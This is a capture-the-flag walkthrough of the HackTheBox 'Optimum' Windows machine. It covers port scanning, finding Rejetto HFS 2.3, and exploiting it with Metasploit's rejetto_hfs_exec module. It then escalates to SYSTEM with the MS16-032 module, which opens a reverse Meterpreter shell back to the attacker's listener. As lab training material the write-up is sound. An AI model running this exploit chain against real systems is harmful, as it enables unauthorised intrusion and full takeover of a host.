Optimum windows machine by HackTheBox.com
Enumeration
Find open ports
1
2
3
4
5
6
7
8
9
$ sudo masscan -e tun0 -p0-65535 --max-rate 500 10.10.10.8
Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-10-28 00:24:21 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65536 ports/host]
Discovered open port 80/tcp on 10.10.10.8
More enum with nmap:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
$ nmap -sC -sV -p80 10.10.10.8
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-28 08:37 AWST
Nmap scan report for optimum.htb (10.10.10.8)
Host is up (0.26s latency).
PORT STATE SERVICE VERSION
80/tcp open http HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.82 seconds
Notice we have HFS 2.3 running. Let us searchspoilt for HFS 2.3:
1
2
3
4
5
6
7
8
9
10
11
12
13
$ searchsploit 'HFS 2.3'
------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------- ---------------------------------
HFS Http File Server 2.3m Build 300 - Buffer Overflow (PoC) | multiple/remote/48569.py
Rejetto HTTP File Server (HFS) 2.2/2.3 - Arbitrary File Upload | multiple/remote/30850.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1) | windows/remote/34668.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2) | windows/remote/39161.py
Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command Execution | windows/webapps/34852.txt
------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Nice we have RCE for the Rejetto HFS 2.3.x!
Exploit Rejetto
Time to load a msfconsole and see if we can find the RCE exploit. One way to search I found is using the inbuilt grep like this:
1
2
3
4
msf5 > grep hfs search
140 exploit/windows/http/rejetto_hfs_exec 2014-09-11 excellent Yes Rejetto HttpFileServer Remote Command Execution
By setting just the LHOST and RHOST and running the exploit we get a windows shell:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
> ls
Listing: C:\Users\kostas\Desktop
================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2020-11-03 17:58:59 +0800 %TEMP%
100666/rw-rw-rw- 282 fil 2017-03-18 19:57:16 +0800 desktop.ini
100777/rwxrwxrwx 760320 fil 2014-02-16 19:58:52 +0800 hfs.exe
100444/r--r--r-- 32 fil 2017-03-18 20:13:18 +0800 user.txt.txt
meterpreter > cat user.txt.txt
Following command is usefull to upgrade the shell shell. Press CTRL+C to back out of the upgraded shell.
PrivEsc
From here we can load some enumeration
1
2
3
4
5
6
[1] background
[2] search suggest
[3] use post/multi/recon/local_exploit_suggester
[4] options
[5] set session 1
[6] run
Lets see what it is vulnerable against:
1
2
3
4
5
6
7
8
9
10
11
12
msf5 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf5 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.10.8 - Collecting local exploits for x86/windows...
[*] 10.10.10.8 - 34 exploit checks are being tried...
[+] 10.10.10.8 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
nil versions are discouraged and will be deprecated in Rubygems 4
[+] 10.10.10.8 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[*] Post module execution completed
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
msf5 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set session 1
session => 1
msf5 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set LHOST 10.10.14.26
LHOST => 10.10.14.26
msf5 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set LPORT 4443
LPORT => 4443
msf5 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > run
[*] Started reverse TCP handler on 10.10.14.26:4443
[+] Compressed size: 1016
[!] Executing 32-bit payload on 64-bit ARCH, using SYSWOW64 powershell
[*] Writing payload file, C:\Users\kostas\AppData\Local\Temp\svdgZGjdnpir.ps1...
[*] Compressing script contents...
[+] Compressed size: 3596
[*] Executing exploit script...
__ __ ___ ___ ___ ___ ___ ___
| V | _|_ | | _|___| |_ |_ |
| |_ |_| |_| . |___| | |_ | _|
|_|_|_|___|_____|___| |___|___|___|
[by b33f -> @FuzzySec]
[?] Operating system core count: 2
[>] Duplicating CreateProcessWithLogonW handle
[?] Done, using thread handle: 2108
[*] Sniffing out privileged impersonation token..
[?] Thread belongs to: svchost
[+] Thread suspended
[>] Wiping current impersonation token
[>] Building SYSTEM impersonation token
[?] Success, open SYSTEM token handle: 2088
[+] Resuming thread..
[*] Sniffing out SYSTEM shell..
[>] Duplicating SYSTEM token
[>] Starting token race
[>] Starting process race
[!] Holy handle leak Batman, we have a SYSTEM shell!!
lF6m5TQfuFviZtXSzwbgV9XLXQspfIqI
[+] Executed on target machine.
[*] Sending stage (176195 bytes) to 10.10.10.8
[*] Meterpreter session 2 opened (10.10.14.26:4443 -> 10.10.10.8:49167) at 2020-10-28 09:03:18 +0800
[+] Deleted C:\Users\kostas\AppData\Local\Temp\svdgZGjdnpir.ps1
meterpreter > shell
Process 2784 created.
Channel 1 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Users\kostas\Desktop>net user
net user
User accounts for \\OPTIMUM
-------------------------------------------------------------------------------
Administrator Guest kostas
The command completed successfully.
C:\Users\kostas\Desktop>whoami
whoami
nt authority\system
C:\Users\kostas\Desktop>
And we have privesc.
Flag located at C\Users\Administrator\Desktop. BQ